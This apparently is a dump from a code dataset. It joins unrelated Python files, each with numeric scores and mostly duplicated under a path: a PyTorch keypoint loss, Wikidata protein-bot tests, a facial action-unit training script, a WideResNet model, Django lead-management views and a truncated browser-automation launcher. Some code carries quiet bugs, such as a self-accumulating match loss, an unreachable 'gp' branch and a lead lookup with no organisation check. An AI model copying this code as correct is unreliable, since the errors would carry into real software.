5)).to(image_sequence.device) laplacian_sums = torch.empty(size=(N, T, K, 1)).to(image_sequence.device) feature_ids = [] total_loss = torch.zeros(size=(N,)).to(image_sequence.device) # total_loss.requires_grad_(True) for t in range(0, T): loss_per_timestep = torch.zeros(size=(N,)).to(image_sequence.device) # loss_per_timestep.requires_grad_(True) for k in range(0, K): """ Anchor patch """ matches = [(t_i, k) for t_i in range(max(t - pos_range, 0), min(t + pos_range + 1, T))] if time_window > 1 else [] matches.remove((t, k)) non_matches = [(t_j, k_j) for t_j in range(max(t - pos_range, 0), min(t + pos_range + 1, T)) for k_j in range(0, K) if k_j != k] # Anchor patch if (t, k) in feature_ids: anchor_ft = features[:, t, k, ...] anchor_laplacian_sum = laplacian_sums[:, t, k, ...].squeeze(1) else: anchor_ft, anchor_laplacian_sum = get_representation( keypoint_coordinates=keypoint_coordinates[:, t, k, ...], image=image_sequence[:, t, ...], feature_map=feature_map_seq[:, t, k, ...]) features[:, t, k, ...] = anchor_ft laplacian_sums[:, t, k, ...] = anchor_laplacian_sum.unsqueeze(-1) feature_ids.append((t, k)) """ Match (positive) patches """ L_match = torch.zeros(size=(N,)).to(image_sequence.device) # L_match.requires_grad_(True) for t_i, k_i in matches: if (t_i, k_i) in feature_ids: #print('selected') match_ft = features[:, t_i, k_i, ...] match_laplacian_sum = laplacian_sums[:, t_i, k_i, ...].squeeze(1) else: #print('calculated') match_ft, match_laplacian_sum = get_representation( keypoint_coordinates=keypoint_coordinates[:, t_i, k_i, ...], image=image_sequence[:, t_i, ...], feature_map=feature_map_seq[:, t_i, k_i, ...]) features[:, t_i, k_i, ...] = match_ft laplacian_sums[:, t_i, k_i, ...] = match_laplacian_sum.unsqueeze(-1) feature_ids.append((t_i, k_i)) L_match = L_match + torch.mul( L_match + torch.norm(anchor_ft - match_ft, dim=1, p=2), torch.abs(anchor_laplacian_sum - match_laplacian_sum)) L_match = L_match / len(matches) """ Non-match (negative) patches """ L_non_match = torch.zeros(size=(N,)).to(image_sequence.device) # L_non_match.requires_grad_(True) for t_j, k_j in non_matches: if (t_j, k_j) in feature_ids: #print('selected') non_match_ft = features[:, t_j, k_j, ...] non_match_laplacian_sum = laplacian_sums[:, t_j, k_j, ...].squeeze(1) else: #print('calculated') non_match_ft, non_match_laplacian_sum = get_representation( keypoint_coordinates=keypoint_coordinates[:, t_j, k_j, ...], image=image_sequence[:, t_j, ...], feature_map=feature_map_seq[:, t_j, k_j, ...]) features[:, t_j, k_j, ...] = non_match_ft laplacian_sums[:, t_j, k_j, ...] = non_match_laplacian_sum.unsqueeze(-1) feature_ids.append((t_j, k_j)) L_non_match = L_non_match + torch.mul( torch.norm(anchor_ft - non_match_ft, dim=1, p=2), torch.abs(anchor_laplacian_sum - non_match_laplacian_sum)) L_non_match = L_non_match / len(non_matches) loss_per_timestep = loss_per_timestep + \ torch.maximum(L_match - L_non_match + alpha, torch.zeros(size=(N,)).to(image_sequence.device)) loss_per_timestep = torch.div(loss_per_timestep, (K * (time_window * K - 1))) total_loss = total_loss + loss_per_timestep # Average across batch return torch.mean(total_loss, dim=0)
0.774029
0.772874
from wikidataintegrator import wdi_login, wdi_core, wdi_helpers from scheduled_bots.geneprotein import HelperBot from scheduled_bots.geneprotein.ProteinBot import main, Protein, PROPS from pymongo import MongoClient from scheduled_bots.local import WDUSER, WDPASS def _test_write_one_protein(qid, entrezgene, taxid): coll = MongoClient().wikidata_src.mygene metadata_coll = MongoClient().wikidata_src.mygene_sources metadata = metadata_coll.find_one() doc_filter = {'_id': entrezgene} print("total number of records: {}".format(coll.find(doc_filter).count())) main(coll, taxid=taxid, metadata=metadata, fast_run=False, write=True, doc_filter=doc_filter) fn = wdi_core.WDItemEngine.logger.handlers[0].baseFilename log = open(fn).read() assert qid in log assert "WARNING" not in log and "ERROR" not in log def test_write_one_human_protein(): qid = "Q21109414" taxid = '9606' entrezgene = '1877' _test_write_one_protein(qid, entrezgene, taxid) def test_write_one_microbe_protein(): qid = "Q23433065" taxid = '243277' entrezgene = '2614876' _test_write_one_protein(qid, entrezgene, taxid) def test_write_another_microbe_protein(): qid = "Q30106073" taxid = '243161' entrezgene = '1246473' _test_write_one_protein(qid, entrezgene, taxid) def test_write_one_yeast_protein(): qid = "Q27547347" taxid = '559292' entrezgene = '856002' _test_write_one_protein(qid, entrezgene, taxid) def test_write_one_mouse_protein(): qid = "Q21990557" taxid = '10090' entrezgene = '19744' _test_write_one_protein(qid, entrezgene, taxid) def validate_all_human_protein(): # runs all proteins through the validator # and generates a log file coll = MongoClient().wikidata_src.mygene metadata_coll = MongoClient().wikidata_src.mygene_sources metadata = metadata_coll.find_one() doc_filter = {'taxid': 9606, 'entrezgene': {'$exists': True}} docs = coll.find(doc_filter) print("total number of records: {}".format(coll.find(doc_filter).count())) validate_type = 'eukaryotic' docs = HelperBot.validate_docs(docs, validate_type, 'P351') records = HelperBot.tag_mygene_docs(docs, metadata) _ = list(records)
scheduled_bots/geneprotein/test_ProteinBot.py
from wikidataintegrator import wdi_login, wdi_core, wdi_helpers from scheduled_bots.geneprotein import HelperBot from scheduled_bots.geneprotein.ProteinBot import main, Protein, PROPS from pymongo import MongoClient from scheduled_bots.local import WDUSER, WDPASS def _test_write_one_protein(qid, entrezgene, taxid): coll = MongoClient().wikidata_src.mygene metadata_coll = MongoClient().wikidata_src.mygene_sources metadata = metadata_coll.find_one() doc_filter = {'_id': entrezgene} print("total number of records: {}".format(coll.find(doc_filter).count())) main(coll, taxid=taxid, metadata=metadata, fast_run=False, write=True, doc_filter=doc_filter) fn = wdi_core.WDItemEngine.logger.handlers[0].baseFilename log = open(fn).read() assert qid in log assert "WARNING" not in log and "ERROR" not in log def test_write_one_human_protein(): qid = "Q21109414" taxid = '9606' entrezgene = '1877' _test_write_one_protein(qid, entrezgene, taxid) def test_write_one_microbe_protein(): qid = "Q23433065" taxid = '243277' entrezgene = '2614876' _test_write_one_protein(qid, entrezgene, taxid) def test_write_another_microbe_protein(): qid = "Q30106073" taxid = '243161' entrezgene = '1246473' _test_write_one_protein(qid, entrezgene, taxid) def test_write_one_yeast_protein(): qid = "Q27547347" taxid = '559292' entrezgene = '856002' _test_write_one_protein(qid, entrezgene, taxid) def test_write_one_mouse_protein(): qid = "Q21990557" taxid = '10090' entrezgene = '19744' _test_write_one_protein(qid, entrezgene, taxid) def validate_all_human_protein(): # runs all proteins through the validator # and generates a log file coll = MongoClient().wikidata_src.mygene metadata_coll = MongoClient().wikidata_src.mygene_sources metadata = metadata_coll.find_one() doc_filter = {'taxid': 9606, 'entrezgene': {'$exists': True}} docs = coll.find(doc_filter) print("total number of records: {}".format(coll.find(doc_filter).count())) validate_type = 'eukaryotic' docs = HelperBot.validate_docs(docs, validate_type, 'P351') records = HelperBot.tag_mygene_docs(docs, metadata) _ = list(records)
0.317532
0.27677
import argparse import shutil from functools import partial from pathlib import Path import numpy as np from python_tools.generic import namespace_as_string from python_tools.ml import metrics from python_tools.ml.default.neural_models import EnsembleModel, MLPModel from python_tools.ml.default.transformations import ( DefaultTransformations, revert_transform, set_transform, ) from python_tools.ml.evaluator import evaluator from dataloader import BP4D_PLUS, DISFA, MNIST def train(partitions: dict[str, DISFA], folder: Path, args: argparse.Namespace) -> None: params = {"interval": True, "metric_max": True, "y_names": np.array(["intensity"])} model = MLPModel(device="cuda", **params) grid_search = { "epochs": [5000], "early_stop": [50], "lr": [0.01, 0.001, 0.0001, 0.00001], "dropout": [0.0, 0.5], "layers": [0, 1, 2, 3], "activation": [{"name": "ReLU"}], "attenuation": [""], "sample_weight": [True], } if args.method == "gp": grid_search["final_activation"] = [ {"name": "gpvfe", "embedding_size": 2, "inducing_points": 2000} ] else: grid_search["final_activation"] = [{"name": "linear"}] if args.method == "attenuation": grid_search["attenuation"] = ["gaussian"] elif args.method == "dropout": grid_search["dropout"] = [0.5] elif args.method == "ensemble": model = EnsembleModel(device="cuda", **params) for key in ("layers", "activation", "dropout"): grid_search[f"model_{key}"] = grid_search.pop(key) model.parameters.pop(key) model.update_parameter(grid_search) models, parameters, model_transform = model.get_models() apply_transformation = partial( combine_transformations, model_transform=model_transform ) transform = DefaultTransformations(**params) transforms = tuple([{}] * len(partitions)) kwargs = { "parallel": "local", "n_workers": args.workers, "workers": args.workers, } print(folder) evaluator( models=models, partitions=partitions, parameters=parameters, folder=folder, metric_fun=metrics.interval_metrics, metric="ccc", metric_max=params["metric_max"], learn_transform=transform.define_transform, apply_transform=apply_transformation, revert_transform=revert_transform, transform_parameter=transforms, final_test=True, **kwargs, ) def combine_transformations(data, transform, model_transform=None): data = set_transform(data, transform) data.add_transform(model_transform, optimizable=True) return data if __name__ == "__main__": # argparse parser = argparse.ArgumentParser() au_flags = [ "1", "2", "4", "5", "6", "9", "10", "12", "14", "15", "17", "20", "25", "26", ] for name in au_flags + ["transfer"]: parser.add_argument( f"--{name}", action="store_const", const=True, default=False ) parser.add_argument( "--method", choices=["dropout", "attenuation", "gpvfe", "ensemble"] ) parser.add_argument("--dataset", choices=["disfa", "bp4d_plus", "mnist", "mnisti"]) parser.add_argument("--workers", type=int, default=4) args = parser.parse_args() if args.transfer: assert args.dataset == "bp4d_plus" arg_aus = [] for au in au_flags: if getattr(args, au): arg_aus.append(int(au)) # choose dataloader folds = 1 aus = [1, 2, 4, 5, 6, 9, 12, 15, 17, 20, 25, 26] backend = lambda au, fold, name: DISFA(au, ifold=fold, name=name).get_loader() if args.dataset == "bp4d_plus": aus = [6, 10, 12, 14, 17] backend = lambda au, fold, name: BP4D_PLUS( au, ifold=fold, name=name ).get_loader() elif args.dataset.startswith("mnist"): aus = [6] backend = lambda au, fold, name: MNIST( au, ifold=fold, name=name, imbalance=args.dataset == "mnisti", ).get_loader() if args.transfer: aus = [6, 12, 17] assert args.dataset == "bp4d_plus" def backend(au, fold, name): if name == "test": return DISFA(au, ifold=fold, name=name).get_loader() return BP4D_PLUS(au, ifold=fold, name=name).get_loader() # run on subset of AUs if arg_aus: aus = [au for au in aus if au in arg_aus] for au in aus: print("AU", au) folder = Path(namespace_as_string(args, exclude=("workers",)) + f"_au={au}") if args.transfer: # copy BP4D+ models args.transfer = False folder_bp4d_plus = Path( namespace_as_string(args, exclude=("workers",)) + f"_au={au}" ) args.transfer = True if not folder.is_dir(): shutil.copytree(folder_bp4d_plus, folder) data = { i: { name: backend(au, i, name) for name in ("training", "validation", "test") } for i in range(folds) } train(data, folder, args)
train.py
import argparse import shutil from functools import partial from pathlib import Path import numpy as np from python_tools.generic import namespace_as_string from python_tools.ml import metrics from python_tools.ml.default.neural_models import EnsembleModel, MLPModel from python_tools.ml.default.transformations import ( DefaultTransformations, revert_transform, set_transform, ) from python_tools.ml.evaluator import evaluator from dataloader import BP4D_PLUS, DISFA, MNIST def train(partitions: dict[str, DISFA], folder: Path, args: argparse.Namespace) -> None: params = {"interval": True, "metric_max": True, "y_names": np.array(["intensity"])} model = MLPModel(device="cuda", **params) grid_search = { "epochs": [5000], "early_stop": [50], "lr": [0.01, 0.001, 0.0001, 0.00001], "dropout": [0.0, 0.5], "layers": [0, 1, 2, 3], "activation": [{"name": "ReLU"}], "attenuation": [""], "sample_weight": [True], } if args.method == "gp": grid_search["final_activation"] = [ {"name": "gpvfe", "embedding_size": 2, "inducing_points": 2000} ] else: grid_search["final_activation"] = [{"name": "linear"}] if args.method == "attenuation": grid_search["attenuation"] = ["gaussian"] elif args.method == "dropout": grid_search["dropout"] = [0.5] elif args.method == "ensemble": model = EnsembleModel(device="cuda", **params) for key in ("layers", "activation", "dropout"): grid_search[f"model_{key}"] = grid_search.pop(key) model.parameters.pop(key) model.update_parameter(grid_search) models, parameters, model_transform = model.get_models() apply_transformation = partial( combine_transformations, model_transform=model_transform ) transform = DefaultTransformations(**params) transforms = tuple([{}] * len(partitions)) kwargs = { "parallel": "local", "n_workers": args.workers, "workers": args.workers, } print(folder) evaluator( models=models, partitions=partitions, parameters=parameters, folder=folder, metric_fun=metrics.interval_metrics, metric="ccc", metric_max=params["metric_max"], learn_transform=transform.define_transform, apply_transform=apply_transformation, revert_transform=revert_transform, transform_parameter=transforms, final_test=True, **kwargs, ) def combine_transformations(data, transform, model_transform=None): data = set_transform(data, transform) data.add_transform(model_transform, optimizable=True) return data if __name__ == "__main__": # argparse parser = argparse.ArgumentParser() au_flags = [ "1", "2", "4", "5", "6", "9", "10", "12", "14", "15", "17", "20", "25", "26", ] for name in au_flags + ["transfer"]: parser.add_argument( f"--{name}", action="store_const", const=True, default=False ) parser.add_argument( "--method", choices=["dropout", "attenuation", "gpvfe", "ensemble"] ) parser.add_argument("--dataset", choices=["disfa", "bp4d_plus", "mnist", "mnisti"]) parser.add_argument("--workers", type=int, default=4) args = parser.parse_args() if args.transfer: assert args.dataset == "bp4d_plus" arg_aus = [] for au in au_flags: if getattr(args, au): arg_aus.append(int(au)) # choose dataloader folds = 1 aus = [1, 2, 4, 5, 6, 9, 12, 15, 17, 20, 25, 26] backend = lambda au, fold, name: DISFA(au, ifold=fold, name=name).get_loader() if args.dataset == "bp4d_plus": aus = [6, 10, 12, 14, 17] backend = lambda au, fold, name: BP4D_PLUS( au, ifold=fold, name=name ).get_loader() elif args.dataset.startswith("mnist"): aus = [6] backend = lambda au, fold, name: MNIST( au, ifold=fold, name=name, imbalance=args.dataset == "mnisti", ).get_loader() if args.transfer: aus = [6, 12, 17] assert args.dataset == "bp4d_plus" def backend(au, fold, name): if name == "test": return DISFA(au, ifold=fold, name=name).get_loader() return BP4D_PLUS(au, ifold=fold, name=name).get_loader() # run on subset of AUs if arg_aus: aus = [au for au in aus if au in arg_aus] for au in aus: print("AU", au) folder = Path(namespace_as_string(args, exclude=("workers",)) + f"_au={au}") if args.transfer: # copy BP4D+ models args.transfer = False folder_bp4d_plus = Path( namespace_as_string(args, exclude=("workers",)) + f"_au={au}" ) args.transfer = True if not folder.is_dir(): shutil.copytree(folder_bp4d_plus, folder) data = { i: { name: backend(au, i, name) for name in ("training", "validation", "test") } for i in range(folds) } train(data, folder, args)
0.531696
0.391348
import torch.nn as nn import torch.nn.functional as F def conv_2d(ni, nf, stride=1, ks=3): """3x3 convolution with 1 pixel padding""" return nn.Conv2d(in_channels=ni, out_channels=nf, kernel_size=ks, stride=stride, padding=ks//2, bias=False) def bn_relu_conv(ni, nf): """BatchNorm → ReLU → Conv2D""" return nn.Sequential(nn.BatchNorm2d(ni), nn.ReLU(inplace=True), conv_2d(ni, nf)) class BasicBlock(nn.Module): """Residual block with shortcut connection""" def __init__(self, ni, nf, stride=1): super().__init__() self.bn = nn.BatchNorm2d(ni) self.conv1 = conv_2d(ni, nf, stride) self.conv2 = bn_relu_conv(nf, nf) self.shortcut = lambda x: x if ni != nf: self.shortcut = conv_2d(ni, nf, stride, 1) def forward(self, x): x = F.relu(self.bn(x), inplace=True) r = self.shortcut(x) x = self.conv1(x) x = self.conv2(x) * 0.2 return x.add_(r) def make_group(N, ni, nf, stride): """Group of residual blocks""" start = BasicBlock(ni, nf, stride) rest = [BasicBlock(nf, nf) for j in range(1, N)] return [start] + rest class Flatten(nn.Module): def __init__(self): super().__init__() def forward(self, x): return x.view(x.size(0), -1) class WideResNet(nn.Module): def __init__(self, n_groups, N, n_classes, k=1, n_start=16): super().__init__() # Increase channels to n_start using conv layer layers = [conv_2d(3, n_start)] n_channels = [n_start] # Add groups of BasicBlock(increase channels & downsample) for i in range(n_groups): n_channels.append(n_start*(2**i)*k) stride = 2 if i>0 else 1 layers += make_group(N, n_channels[i], n_channels[i+1], stride) # Pool, flatten & add linear layer for classification layers += [nn.BatchNorm2d(n_channels[3]), nn.ReLU(inplace=True), nn.AdaptiveAvgPool2d(1), Flatten(), nn.Linear(n_channels[3], n_classes)] self.features = nn.Sequential(*layers) def forward(self, x): return self.features(x) def wrn_22(): return WideResNet(n_groups=3, N=3, n_classes=512, k=6)
wrn.py
import torch.nn as nn import torch.nn.functional as F def conv_2d(ni, nf, stride=1, ks=3): """3x3 convolution with 1 pixel padding""" return nn.Conv2d(in_channels=ni, out_channels=nf, kernel_size=ks, stride=stride, padding=ks//2, bias=False) def bn_relu_conv(ni, nf): """BatchNorm → ReLU → Conv2D""" return nn.Sequential(nn.BatchNorm2d(ni), nn.ReLU(inplace=True), conv_2d(ni, nf)) class BasicBlock(nn.Module): """Residual block with shortcut connection""" def __init__(self, ni, nf, stride=1): super().__init__() self.bn = nn.BatchNorm2d(ni) self.conv1 = conv_2d(ni, nf, stride) self.conv2 = bn_relu_conv(nf, nf) self.shortcut = lambda x: x if ni != nf: self.shortcut = conv_2d(ni, nf, stride, 1) def forward(self, x): x = F.relu(self.bn(x), inplace=True) r = self.shortcut(x) x = self.conv1(x) x = self.conv2(x) * 0.2 return x.add_(r) def make_group(N, ni, nf, stride): """Group of residual blocks""" start = BasicBlock(ni, nf, stride) rest = [BasicBlock(nf, nf) for j in range(1, N)] return [start] + rest class Flatten(nn.Module): def __init__(self): super().__init__() def forward(self, x): return x.view(x.size(0), -1) class WideResNet(nn.Module): def __init__(self, n_groups, N, n_classes, k=1, n_start=16): super().__init__() # Increase channels to n_start using conv layer layers = [conv_2d(3, n_start)] n_channels = [n_start] # Add groups of BasicBlock(increase channels & downsample) for i in range(n_groups): n_channels.append(n_start*(2**i)*k) stride = 2 if i>0 else 1 layers += make_group(N, n_channels[i], n_channels[i+1], stride) # Pool, flatten & add linear layer for classification layers += [nn.BatchNorm2d(n_channels[3]), nn.ReLU(inplace=True), nn.AdaptiveAvgPool2d(1), Flatten(), nn.Linear(n_channels[3], n_classes)] self.features = nn.Sequential(*layers) def forward(self, x): return self.features(x) def wrn_22(): return WideResNet(n_groups=3, N=3, n_classes=512, k=6)
0.959677
0.469581
from django.shortcuts import reverse from django.views import generic from django.contrib.auth.mixins import LoginRequiredMixin from agents.mixins import OrganiserAndLoginRequiredMixin from .models import Lead, Category, Agent from .forms import ( LeadModelForm, CustomUserCreationForm, AssignAgentForm, LeadCategoryUpdateForm, CategoryModelForm ) class SignupView(generic.CreateView): template_name = 'registration/signup.html' form_class = CustomUserCreationForm def get_success_url(self): return reverse('login') class LandingPageView(generic.TemplateView): template_name = 'landing.html' class LeadListView(LoginRequiredMixin, generic.ListView): template_name = 'leads/lead_list.html' context_object_name = 'leads' def get_queryset(self): user = self.request.user if self.request.user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile, agent__isnull=False) else: queryset = Lead.objects.filter(organisation=user.agent.organisation, agent__isnull=False) queryset = queryset.filter(agent__user=user) return queryset def get_context_data(self, **kwargs): context = super(LeadListView, self).get_context_data(**kwargs) user = self.request.user if user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile, agent__isnull=True) context.update({ 'unassigned_leads': queryset }) return context class LeadDetailView(OrganiserAndLoginRequiredMixin, generic.DetailView): template_name = 'leads/lead_detail.html' def get_queryset(self): return Lead.objects.filter(organisation=self.request.user.userprofile) class LeadCreateView(OrganiserAndLoginRequiredMixin, generic.CreateView): template_name = 'leads/lead_create.html' form_class = LeadModelForm def form_valid(self, form): lead = form.save(commit=False) user = self.request.user if user.is_organiser: lead.organisation = user.userprofile else: lead.organisation = user.agent.organisation lead.save() return super(LeadCreateView, self).form_valid(form) def get_success_url(self): return reverse('leads:lead-list') class LeadUpdateView(OrganiserAndLoginRequiredMixin, generic.UpdateView): template_name = 'leads/lead_update.html' form_class = LeadModelForm def get_form(self, form_class=None): form = super(LeadUpdateView, self).get_form(form_class) user = self.request.user if self.request.user.is_organiser: queryset = Agent.objects.filter(organisation=user.userprofile) else: queryset = Agent.objects.filter(organisation=user.agent.organisation) form.fields['agent'].queryset = queryset return form def get_queryset(self): return Lead.objects.filter(organisation=self.request.user.userprofile) def get_success_url(self): return reverse('leads:lead-detail', kwargs={'pk': self.get_object().pk}) class LeadDeleteView(OrganiserAndLoginRequiredMixin, generic.DeleteView): template_name = 'leads/lead_delete.html' def get_queryset(self): return Lead.objects.filter(organisation=self.request.user.userprofile) def get_success_url(self): return reverse('leads:lead-list') class AssignAgentView(OrganiserAndLoginRequiredMixin, generic.FormView): template_name = 'leads/assign_agent.html' form_class = AssignAgentForm def get_form_kwargs(self): kwargs = super(AssignAgentView, self).get_form_kwargs() kwargs.update({'request': self.request}) return kwargs def form_valid(self, form): lead = Lead.objects.get(id=self.kwargs.get('pk')) lead.agent = form.cleaned_data.get('agent') lead.save() return super(AssignAgentView, self).form_valid(form) def get_success_url(self): return reverse('leads:lead-list') class CategoryListView(LoginRequiredMixin, generic.ListView): template_name = 'leads/category_list.html' context_object_name = 'categories' def get_context_data(self, **kwargs): context = super(CategoryListView, self).get_context_data(**kwargs) user = self.request.user if user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile) else: queryset = Lead.objects.filter(organisation=user.agent.organisation) context.update({ 'unassigned_lead_count': queryset.filter(category__isnull=True).count() }) return context def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) class CategoryDetailView(LoginRequiredMixin, generic.DetailView): template_name = 'leads/category_detail.html' def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) class LeadCategoryUpdateView(LoginRequiredMixin, generic.UpdateView): template_name = 'leads/lead_category_update.html' form_class = LeadCategoryUpdateForm def get_form(self, form_class=None): form = super(LeadCategoryUpdateView, self).get_form(form_class) user = self.request.user if self.request.user.is_organiser: queryset = Category.objects.filter(organisation=user.userprofile) else: queryset = Category.objects.filter(organisation=user.agent.organisation) form.fields['category'].queryset = queryset return form def get_queryset(self): user = self.request.user if self.request.user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile, agent__isnull=False) else: queryset = Lead.objects.filter(organisation=user.agent.organisation, agent__isnull=False) queryset = queryset.filter(agent__user=user) return queryset def get_success_url(self): return reverse('leads:lead-detail', kwargs={'pk': self.get_object().pk}) class CategoryCreateView(OrganiserAndLoginRequiredMixin, generic.CreateView): template_name = 'leads/category_create.html' form_class = CategoryModelForm def form_valid(self, form): category = form.save(commit=False) category.organisation = self.request.user.userprofile category.save() return super(CategoryCreateView, self).form_valid(form) def get_success_url(self): return reverse('leads:category-list') class CategoryUpdateView(OrganiserAndLoginRequiredMixin, generic.UpdateView): template_name = 'leads/category_update.html' form_class = CategoryModelForm def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) def get_success_url(self): return reverse('leads:category-list') class CategoryDeleteView(OrganiserAndLoginRequiredMixin, generic.DeleteView): template_name = 'leads/lead_delete.html' def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) def get_success_url(self): return reverse('leads:category-list')
leads/views.py
from django.shortcuts import reverse from django.views import generic from django.contrib.auth.mixins import LoginRequiredMixin from agents.mixins import OrganiserAndLoginRequiredMixin from .models import Lead, Category, Agent from .forms import ( LeadModelForm, CustomUserCreationForm, AssignAgentForm, LeadCategoryUpdateForm, CategoryModelForm ) class SignupView(generic.CreateView): template_name = 'registration/signup.html' form_class = CustomUserCreationForm def get_success_url(self): return reverse('login') class LandingPageView(generic.TemplateView): template_name = 'landing.html' class LeadListView(LoginRequiredMixin, generic.ListView): template_name = 'leads/lead_list.html' context_object_name = 'leads' def get_queryset(self): user = self.request.user if self.request.user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile, agent__isnull=False) else: queryset = Lead.objects.filter(organisation=user.agent.organisation, agent__isnull=False) queryset = queryset.filter(agent__user=user) return queryset def get_context_data(self, **kwargs): context = super(LeadListView, self).get_context_data(**kwargs) user = self.request.user if user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile, agent__isnull=True) context.update({ 'unassigned_leads': queryset }) return context class LeadDetailView(OrganiserAndLoginRequiredMixin, generic.DetailView): template_name = 'leads/lead_detail.html' def get_queryset(self): return Lead.objects.filter(organisation=self.request.user.userprofile) class LeadCreateView(OrganiserAndLoginRequiredMixin, generic.CreateView): template_name = 'leads/lead_create.html' form_class = LeadModelForm def form_valid(self, form): lead = form.save(commit=False) user = self.request.user if user.is_organiser: lead.organisation = user.userprofile else: lead.organisation = user.agent.organisation lead.save() return super(LeadCreateView, self).form_valid(form) def get_success_url(self): return reverse('leads:lead-list') class LeadUpdateView(OrganiserAndLoginRequiredMixin, generic.UpdateView): template_name = 'leads/lead_update.html' form_class = LeadModelForm def get_form(self, form_class=None): form = super(LeadUpdateView, self).get_form(form_class) user = self.request.user if self.request.user.is_organiser: queryset = Agent.objects.filter(organisation=user.userprofile) else: queryset = Agent.objects.filter(organisation=user.agent.organisation) form.fields['agent'].queryset = queryset return form def get_queryset(self): return Lead.objects.filter(organisation=self.request.user.userprofile) def get_success_url(self): return reverse('leads:lead-detail', kwargs={'pk': self.get_object().pk}) class LeadDeleteView(OrganiserAndLoginRequiredMixin, generic.DeleteView): template_name = 'leads/lead_delete.html' def get_queryset(self): return Lead.objects.filter(organisation=self.request.user.userprofile) def get_success_url(self): return reverse('leads:lead-list') class AssignAgentView(OrganiserAndLoginRequiredMixin, generic.FormView): template_name = 'leads/assign_agent.html' form_class = AssignAgentForm def get_form_kwargs(self): kwargs = super(AssignAgentView, self).get_form_kwargs() kwargs.update({'request': self.request}) return kwargs def form_valid(self, form): lead = Lead.objects.get(id=self.kwargs.get('pk')) lead.agent = form.cleaned_data.get('agent') lead.save() return super(AssignAgentView, self).form_valid(form) def get_success_url(self): return reverse('leads:lead-list') class CategoryListView(LoginRequiredMixin, generic.ListView): template_name = 'leads/category_list.html' context_object_name = 'categories' def get_context_data(self, **kwargs): context = super(CategoryListView, self).get_context_data(**kwargs) user = self.request.user if user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile) else: queryset = Lead.objects.filter(organisation=user.agent.organisation) context.update({ 'unassigned_lead_count': queryset.filter(category__isnull=True).count() }) return context def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) class CategoryDetailView(LoginRequiredMixin, generic.DetailView): template_name = 'leads/category_detail.html' def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) class LeadCategoryUpdateView(LoginRequiredMixin, generic.UpdateView): template_name = 'leads/lead_category_update.html' form_class = LeadCategoryUpdateForm def get_form(self, form_class=None): form = super(LeadCategoryUpdateView, self).get_form(form_class) user = self.request.user if self.request.user.is_organiser: queryset = Category.objects.filter(organisation=user.userprofile) else: queryset = Category.objects.filter(organisation=user.agent.organisation) form.fields['category'].queryset = queryset return form def get_queryset(self): user = self.request.user if self.request.user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile, agent__isnull=False) else: queryset = Lead.objects.filter(organisation=user.agent.organisation, agent__isnull=False) queryset = queryset.filter(agent__user=user) return queryset def get_success_url(self): return reverse('leads:lead-detail', kwargs={'pk': self.get_object().pk}) class CategoryCreateView(OrganiserAndLoginRequiredMixin, generic.CreateView): template_name = 'leads/category_create.html' form_class = CategoryModelForm def form_valid(self, form): category = form.save(commit=False) category.organisation = self.request.user.userprofile category.save() return super(CategoryCreateView, self).form_valid(form) def get_success_url(self): return reverse('leads:category-list') class CategoryUpdateView(OrganiserAndLoginRequiredMixin, generic.UpdateView): template_name = 'leads/category_update.html' form_class = CategoryModelForm def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) def get_success_url(self): return reverse('leads:category-list') class CategoryDeleteView(OrganiserAndLoginRequiredMixin, generic.DeleteView): template_name = 'leads/lead_delete.html' def get_queryset(self): user = self.request.user if user.is_organiser: return Category.objects.filter(organisation=user.userprofile) else: return Category.objects.filter(organisation=user.agent.organisation) def get_success_url(self): return reverse('leads:category-list')
0.532425
0.102844
import logging from init_program import ( init_prog, start_browser, login_base ) from full_cycle import menu_full_cycle_go, page_full_cycle_go from serializer import write_serialize_data, read_serialize_data, delete_screens_and_log from toolbox import log_record, exit_prog from scenario_mod import start_scenario from cursor_pos import cursor_pos from partial_cycle import start_partial_cycle from go_open_form import open_forms from webdriver import get_webdriver_quit ''' главный модуль программы запуск программы происходит из этого модуля ''' def check_table_elements(main_data:object): table_elements = main_data.table_elements() if table_elements == None or len(table_elements['table']) == 0: get_webdriver_quit(main_data.driver()) log_record('программа прекратила работу, нет сохраненной таблицы меню, воспользуйтесь созданием данной таблицы через запуск программы в режиме savemenu') exit_prog() def check_end(main_data, last_mode:str, curr_mode:str, str_log:str): if last_mode == curr_mode: get_webdriver_quit(main_data.driver()) log_record(str_log) logging.shutdown() def main_func(): main_data = login_base( start_browser( init_prog(tuple()) ) ) mode = main_data.mode() last_mode = mode[-1] if main_data.del_screen_and_log() == 'Yes': delete_screens_and_log() log_record('НАЧАЛО РАБОТЫ ПРОГРАММЫ') for m in mode: if m == 'savemenu': log_record('началось чтение разделов меню программы') old_table = read_serialize_data('dict_main_elements') del old_table main_data = menu_full_cycle_go(main_data) write_serialize_data('dict_main_elements', main_data.table_elements()) check_end(main_data, last_mode, 'savemenu', 'разделы сохранены в файл dict_main_elements.pickle') elif m == 'go': log_record('начался обход') main_data.set_table_elements( read_serialize_data(text='dict_main_elements', remove_arg=False) ) check_table_elements(main_data) page_full_cycle_go(main_data) check_end(main_data, last_mode, 'go', 'обход завершен') elif m == 'scenario': start_scenario(main_data) check_end(main_data, last_mode, 'scenario', 'закончено выполнение сценария') elif m == 'cursor': cursor_pos(main_data) elif m == 'go_partial': log_record('начался частичный обход') main_data.set_table_elements( 